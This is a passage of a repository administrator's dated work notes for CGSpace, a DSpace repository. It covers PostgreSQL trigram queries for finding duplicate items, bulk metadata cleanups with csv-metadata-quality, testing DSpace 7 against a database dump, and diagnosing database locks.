+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; CREATE EXTENSION pg_trgm;
+</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines&#39;) &gt; 0.5;
+</span></span><span style="display:flex;"><span> metadata_value_id │                                         text_value                                         │           dspace_object_id
+</span></span><span style="display:flex;"><span>───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+</span></span><span style="display:flex;"><span>           3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
+</span></span><span style="display:flex;"><span>           3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
+</span></span><span style="display:flex;"><span>(2 rows)
+</span></span></code></pre></div><ul>
+<li>I was able to find an exact duplicate for an IITA item by searching for its title (I already knew that these existed)</li>
+<li>I started working on a basic Python script to do this and managed to find an actual duplicate in the recent IWMI items
+<ul>
+<li>I think I will check for similar titles, and if I find them I will print out the handles for verification</li>
+<li>I could also proceed to check other metadata like type because those shouldn&rsquo;t vary too much</li>
+</ul>
+</li>
+<li>I ran my new <code>check-duplicates.py</code> script on the 292 non-IWMI publications from Udana and found twelve potential duplicates
+<ul>
+<li>Upon checking them manually, I found that 7/12 were indeed already present on CGSpace!</li>
+<li>This is with the similarity threshold at 0.5. I wonder if tweaking that higher will make the script run faster and eliminate some false positives</li>
+<li>I re-ran it with higher thresholds this eliminated all false positives, but it still took 24 minutes to run for 292 items!
+<ul>
+<li>0.6: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs  0.09s user 0.03s system 0% cpu 24:40.42 total</li>
+<li>0.7: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs  0.12s user 0.03s system 0% cpu 24:29.15 total</li>
+<li>0.8: ./ilri/check-duplicates.py -i ~/Downloads/2021-10-03-non-IWMI-publications.cs  0.09s user 0.03s system 0% cpu 25:44.13 total</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Some minor updates to csv-metadata-quality
+<ul>
+<li>Fix two issues with regular expressions in the duplicate items and experimental language checks</li>
+<li>Add a check for items that have a DOI listed in their citation, but are missing a standalone DOI field</li>
+</ul>
+</li>
+<li>Then I ran this new version of csv-metadata-quality on an export of IWMI&rsquo;s community, minus some fields I don&rsquo;t want to check:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -C <span style="color:#e6db74">&#39;dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-to-check.csv
+</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
+</span></span><span style="display:flex;"><span>$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi.csv
+</span></span></code></pre></div><ul>
+<li>I noticed each CSV only had 10 or 20 corrections, mostly that none of the duplicate metadata values were removed in the CSVs&hellip;
+<ul>
+<li>I cut a subset of the fields from the main CSV and tried again, but DSpace said &ldquo;no changes detected&rdquo;</li>
+<li>The duplicates are definitely removed from the CSV, but DSpace doesn&rsquo;t detect them</li>
+<li>I realized this is an issue I&rsquo;ve had before, but forgot because I usually use csv-metadata-quality for new items, not ones already inside DSpace!</li>
+<li>I found a comment on thread on the dspace-tech mailing list from helix84 in 2015 (&ldquo;No changes were detected&rdquo; when importing metadata via XMLUI&quot;) where he says:</li>
+</ul>
+</li>
+</ul>
+<blockquote>
+<p>It&rsquo;s very likely that multiple values in a single field are being compared as an unordered set rather than an ordered list.
+Try doing it in two imports. In first import, remove all authors. In second import, add them in the new order.</p>
+</blockquote>
+<ul>
+<li>Shit, so that&rsquo;s worth looking into&hellip;</li>
+</ul>
+<h2 id="2021-10-07">2021-10-07</h2>
+<ul>
+<li>I decided to upload the cleaned IWMI community by moving the cleaned metadata field from <code>dcterms.subject[en_US]</code> to <code>dcterms.subject[en_Fu]</code> temporarily, uploading them, then moving them back, and uploading again
+<ul>
+<li>I started by copying just a handful of fields from the iwmi.csv community export:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> ~/Downloads/iwmi.csv &gt; /tmp/iwmi-duplicate-metadata.csv
+</span></span><span style="display:flex;"><span># Copy and blank columns in OpenRefine
+</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
+</span></span><span style="display:flex;"><span>$ xsv split -s <span style="color:#ae81ff">2000</span> /tmp /tmp/iwmi-duplicates-cleaned.csv
+</span></span></code></pre></div><ul>
+<li>It takes a few hours per 2,000 items because DSpace processes them so slowly&hellip; sigh&hellip;</li>
+</ul>
+<h2 id="2021-10-08">2021-10-08</h2>
+<ul>
+<li>I decided to update these records in PostgreSQL instead of via several CSV batches, as there were several others to normalize too:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+</span></span><span style="display:flex;"><span> text_lang |  count  
+</span></span><span style="display:flex;"><span>-----------+---------
+</span></span><span style="display:flex;"><span> en_US     | 2603711
+</span></span><span style="display:flex;"><span> en_Fu     |  115568
+</span></span><span style="display:flex;"><span> en        |    8818
+</span></span><span style="display:flex;"><span>           |    5286
+</span></span><span style="display:flex;"><span> fr        |       2
+</span></span><span style="display:flex;"><span> vn        |       2
+</span></span><span style="display:flex;"><span>           |       0
+</span></span><span style="display:flex;"><span>(7 rows)
+</span></span><span style="display:flex;"><span>cgspace=# BEGIN;
+</span></span><span style="display:flex;"><span>cgspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en_Fu&#39;, &#39;en&#39;, &#39;&#39;);
+</span></span><span style="display:flex;"><span>UPDATE 129673
+</span></span><span style="display:flex;"><span>cgspace=# COMMIT;
+</span></span></code></pre></div><ul>
+<li>So all this effort to remove ~400 duplicate metadata values in the IWMI community hmmm:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
+</span></span><span style="display:flex;"><span>391
+</span></span></code></pre></div><ul>
+<li>I tried to export ILRI&rsquo;s community, but ran into the export bug (DS-4211)
+<ul>
+<li>After applying the patch on my local instance I was able to export, but found many duplicate items in the CSV (as I also noticed in 2021-02):</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l 
+</span></span><span style="display:flex;"><span>32070
+</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>19315
+</span></span></code></pre></div><ul>
+<li>It seems there are only about 200 duplicate values in this subset of fields in ILRI&rsquo;s community:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
+</span></span><span style="display:flex;"><span>220
+</span></span></code></pre></div><ul>
+<li>I found a cool way to select only the items with corrections
+<ul>
+<li>First, extract a handful of fields from the CSV with csvcut</li>
+<li>Second, clean the CSV with csv-metadata-quality</li>
+<li>Third, rename the columns to something obvious in the cleaned CSV</li>
+<li>Fourth, use csvjoin to merge the cleaned file with the original</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]&#39;</span> /tmp/ilri.csv | csvsort | uniq &gt; /tmp/ilri-deduplicated-items.csv
+</span></span><span style="display:flex;"><span>$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
+</span></span><span style="display:flex;"><span>$ sed -i -e <span style="color:#e6db74">&#39;1s/en_US/en_Fu/g&#39;</span> /tmp/ilri-deduplicated-items-cleaned.csv
+</span></span><span style="display:flex;"><span>$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv &gt; /tmp/ilri-deduplicated-items-cleaned-joined.csv
+</span></span></code></pre></div><ul>
+<li>Then I imported the file into OpenRefine and used a custom text facet with a GREL like this to identify the rows with changes:</li>
+</ul>
+<pre tabindex="0"><code>if(cells[&#39;dcterms.subject[en_US]&#39;].value == cells[&#39;dcterms.subject[en_Fu]&#39;].value,&#34;same&#34;,&#34;different&#34;)
+</code></pre><ul>
+<li>For these rows I starred them and then blanked out the original field so DSpace would see it as a removal, and add the new column
+<ul>
+<li>After these are uploaded I will normalize the <code>text_lang</code> fields in PostgreSQL again</li>
+</ul>
+</li>
+<li>I did the same for CIAT but there were over 7,000 duplicate metadata values! Hard to believe:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c <span style="color:#e6db74">&#39;Removing duplicate value&#39;</span> /tmp/out.log
+</span></span><span style="display:flex;"><span>7720
+</span></span></code></pre></div><ul>
+<li>I applied these to the CIAT community, so in total that&rsquo;s over 8,000 duplicate metadata values removed in a handful of fields&hellip;</li>
+</ul>
+<h2 id="2021-10-09">2021-10-09</h2>
+<ul>
+<li>I did similar metadata cleanups for CCAFS and IITA too, but there were only a few hundred duplicates there</li>
+<li>Also of note, there are some other fixes too, for example in IITA&rsquo;s community:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -c -E <span style="color:#e6db74">&#39;(Fixing|Removing) (duplicate|excessive|invalid)&#39;</span> /tmp/out.log
+</span></span><span style="display:flex;"><span>249
+</span></span></code></pre></div><ul>
+<li>I ran a full Discovery re-indexing on CGSpace</li>
+<li>Then I exported all of CGSpace and extracted the ISSNs and ISBNs:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,cg.issn[en_US],dc.identifier.issn[en_US],cg.isbn[en_US],dc.identifier.isbn[en_US]&#39;</span> /tmp/cgspace.csv &gt; /tmp/cgspace-issn-isbn.csv
+</span></span></code></pre></div><ul>
+<li>I did cleanups on about seventy items with invalid and mixed ISSNs/ISBNs</li>
+</ul>
+<h2 id="2021-10-10">2021-10-10</h2>
+<ul>
+<li>Start testing DSpace 7.1-SNAPSHOT to see if it has the duplicate item bug on <code>metadata-export</code> (DS-4211)</li>
+<li>First create a new PostgreSQL 13 container:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ podman run --name dspacedb13 -v dspacedb13_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD<span style="color:#f92672">=</span>postgres -p 5433:5432 -d postgres:13-alpine
+</span></span><span style="display:flex;"><span>$ createuser -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres --pwprompt dspacetest
+</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
+</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#39;CREATE EXTENSION pgcrypto;&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Then edit setting in <code>dspace/config/local.cfg</code> and build the backend server with Java 11:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ mvn package
+</span></span><span style="display:flex;"><span>$ cd dspace/target/dspace-installer
+</span></span><span style="display:flex;"><span>$ ant fresh_install
+</span></span><span style="display:flex;"><span># fix database not being fully ready, causing Tomcat to fail to start the server application
+</span></span><span style="display:flex;"><span>$ ~/dspace7/bin/dspace database migrate
+</span></span></code></pre></div><ul>
+<li>Copy Solr configs and start Solr:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cp -Rv ~/dspace7/solr/* ~/src/solr-8.8.2/server/solr/configsets
+</span></span><span style="display:flex;"><span>$ ~/src/solr-8.8.2/bin/solr start
+</span></span></code></pre></div><ul>
+<li>Start my local Tomcat 9 instance:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ systemctl --user start tomcat9@dspace7
+</span></span></code></pre></div><ul>
+<li>This works, so now I will drop the default database and import a dump from CGSpace</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ systemctl --user stop tomcat9@dspace7                                
+</span></span><span style="display:flex;"><span>$ dropdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7
+</span></span><span style="display:flex;"><span>$ createdb -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -O dspacetest --encoding<span style="color:#f92672">=</span>UNICODE dspace7
+</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest superuser;&#39;</span>
+</span></span><span style="display:flex;"><span>$ pg_restore -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -d dspace7 -O --role<span style="color:#f92672">=</span>dspacetest -h localhost dspace-2021-10-09.backup
+</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres -c <span style="color:#e6db74">&#39;alter user dspacetest nosuperuser;&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Delete Atmire migrations and some others that were &ldquo;unresolved&rdquo;:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE description LIKE &#39;%Atmire%&#39; OR description LIKE &#39;%CUA%&#39; OR description LIKE &#39;%cua%&#39;;&#34;</span>
+</span></span><span style="display:flex;"><span>$ psql -h localhost -p <span style="color:#ae81ff">5433</span> -U postgres dspace7 -c <span style="color:#e6db74">&#34;DELETE FROM schema_version WHERE version IN (&#39;5.0.2017.09.25&#39;, &#39;6.0.2017.01.30&#39;, &#39;6.0.2017.09.25&#39;);&#34;</span>
+</span></span></code></pre></div><ul>
+<li>Now DSpace 7 starts with my CGSpace data&hellip; nice
+<ul>
+<li>The Discovery indexing still takes seven hours&hellip; fuck</li>
+</ul>
+</li>
+<li>I tested the <code>metadata-export</code> on DSpace 7.1-SNAPSHOT and it still has the duplicate items issue introduced by DS-4211
+<ul>
+<li>I filed a GitHub issue and notified nwoodward: <a href="https://github.com/DSpace/DSpace/issues/7988">https://github.com/DSpace/DSpace/issues/7988</a></li>
+</ul>
+</li>
+<li>Start a full reindex on AReS</li>
+</ul>
+<h2 id="2021-10-11">2021-10-11</h2>
+<ul>
+<li>Start a full Discovery reindex on my local DSpace 6.3 instance:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ /usr/bin/time -f %M:%e chrt -b <span style="color:#ae81ff">0</span> ~/dspace63/bin/dspace index-discovery -b
+</span></span><span style="display:flex;"><span>Loading @mire database changes for module MQM
+</span></span><span style="display:flex;"><span>Changes have been processed
+</span></span><span style="display:flex;"><span>836140:6543.6
+</span></span></code></pre></div><ul>
+<li>So that&rsquo;s 1.8 hours versus 7 on DSpace 7, with the same database!</li>
+<li>Several users wrote to me that CGSpace was slow recently
+<ul>
+<li>Looking at the PostgreSQL database I see connections look normal, but locks for <code>dspaceWeb</code> are high:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_stat_activity&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>53
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | wc -l
+</span></span><span style="display:flex;"><span>1697
+</span></span><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid WHERE application_name=&#39;dspaceWeb&#39;&#34;</span> | wc -l
+</span></span><span style="display:flex;"><span>1681
+</span></span></code></pre></div><ul>
+<li>Looking at Munin, I see there are indeed a higher number of locks starting on the morning of 2021-10-07:</li>
+</ul>
+<p><img src="/cgspace-notes/2021/10/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
+<ul>
+<li>The only thing I did on 2021-10-07 was import a few thousand metadata corrections&hellip;</li>
+<li>I restarted PostgreSQL (instead of restarting Tomcat), so let&rsquo;s see if that helps</li>
+<li>I filed <a href="https://github.com/DSpace/DSpace/issues/7989">a bug for the DSpace 6/7 duplicate values metadata import issue</a></li>
+<li>I tested the two patches for removing abandoned submissions from the workflow but unfortunately it seems that they are for the configurable aka XML workflow, and we are using the basic workflow</li>
+<li>I discussed PostgreSQL issues with some people on the DSpace Slack
+<ul>
+<li>Looking at postgresqltuner.pl and <a href="https://pgtune.leopard.in.ua">https://pgtune.leopard.in.ua</a> I realized that there were some settings that I hadn&rsquo;t changed in a few years that I probably need to re-evaluate</li>
+<li>For example, <code>random_page_cost</code> is recommended to be 1.1 in the PostgreSQL 10 docs (default is 4.0, but we use 1 since 2017 when it came up in Hacker News)</li>
+<li>Also, <code>effective_io_concurrency</code> is recommended to be &ldquo;hundreds&rdquo; if you are using an SSD (default is 1)</li>
+</ul>
+</li>
+<li>I also enabled the <code>pg_stat_statements</code> extension to try to understand what queries are being run the most often, and how long they take</li>
+</ul>
+<h2 id="2021-10-12">2021-10-12</h2>
+<ul>
+<li>I looked again at the duplicate items query I was doing with trigrams recently and found a few new things
+<ul>
+<li>Looking at the <code>EXPLAIN ANALYZE</code> plan for the query I noticed it wasn&rsquo;t using any indexes</li>
+<li>I <a href="https://dba.stackexchange.com/questions/103821/best-index-for-similarity-function/103823">read on StackExchange</a> that, if we want to make use of indexes, we need to use the similarity operator (<code>%</code>), not the function <code>similarity()</code> because &ldquo;index support is bound to operators in Postgres, not to functions&rdquo;</li>
+<li>A note about the query plan output is that we need to read it from the bottom up!</li>
+<li>So with the similary operator we need to set the threshold like this now:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.5;
+</span></span></code></pre></div><ul>
+<li>Next I experimented with using GIN or GiST indexes on <code>metadatavalue</code>, but they were slower than the existing DSpace indexes
+<ul>
+<li>I tested a few variations of the query I had been using and found it&rsquo;s <em>much</em> faster if I use the similarity operator and keep the condition that object IDs are in the item table&hellip;</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
+</span></span><span style="display:flex;"><span>                                           text_value                                           │           dspace_object_id           
+</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 739.948 ms
+</span></span></code></pre></div><ul>
+<li>Now this script runs in four minutes (versus twenty-four!) and it still finds the same seven duplicates! Amazing!</li>
+<li>I still don&rsquo;t understand the differences in the query plan well enough, but I see it is using the DSpace default indexes and the results are accurate</li>
+<li>So to summarize, the best to the worst query, all returning the same result:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
+</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
+</span></span><span style="display:flex;"><span>                                           text_value                                           │           dspace_object_id           
+</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 683.165 ms
+</span></span><span style="display:flex;"><span>Time: 635.364 ms
+</span></span><span style="display:flex;"><span>Time: 674.666 ms
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
+</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SET pg_trgm.similarity_threshold = 0.6;
+</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND text_value % &#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;;
+</span></span><span style="display:flex;"><span>                                           text_value                                           │           dspace_object_id           
+</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 1584.765 ms (00:01.585)
+</span></span><span style="display:flex;"><span>Time: 1665.594 ms (00:01.666)
+</span></span><span style="display:flex;"><span>Time: 1623.726 ms (00:01.624)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
+</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE metadata_field_id=64 AND SIMILARITY(text_value,&#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;) &gt; 0.6;
+</span></span><span style="display:flex;"><span>                                           text_value                                           │           dspace_object_id           
+</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 4028.939 ms (00:04.029)
+</span></span><span style="display:flex;"><span>Time: 4022.239 ms (00:04.022)
+</span></span><span style="display:flex;"><span>Time: 4061.820 ms (00:04.062)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>localhost/dspace= &gt; DISCARD ALL;
+</span></span><span style="display:flex;"><span>localhost/dspace= &gt; SELECT text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,&#39;Traditional knowledge affects soil management ability of smallholder farmers in marginal areas&#39;) &gt; 0.6;
+</span></span><span style="display:flex;"><span>                                           text_value                                           │           dspace_object_id           
+</span></span><span style="display:flex;"><span>────────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
+</span></span><span style="display:flex;"><span> Traditional knowledge affects soil management ability of smallholder farmers in marginal areas │ 7af059af-9cd7-431b-8a79-7514896ca7dc
+</span></span><span style="display:flex;"><span>(1 row)
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Time: 4358.713 ms (00:04.359)
+</span></span><span style="display:flex;"><span>Time: 4301.248 ms (00:04.301)
+</span></span><span style="display:flex;"><span>Time: 4417.909 ms (00:04.418)
+</span></span></code></pre></div><h2 id="2021-10-13">2021-10-13</h2>
+<ul>
+<li>I looked into the <a href="https://github.com/DSpace/DSpace/issues/7946">REST API issue where fields without qualifiers throw an HTTP 500</a>
+<ul>
+<li>The fix is to check if the qualifier is not null AND not empty in dspace-api</li>
+<li>I submitted a fix: <a href="https://github.com/DSpace/DSpace/pull/7993">https://github.com/DSpace/DSpace/pull/7993</a></li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-10-14">2021-10-14</h2>
+<ul>
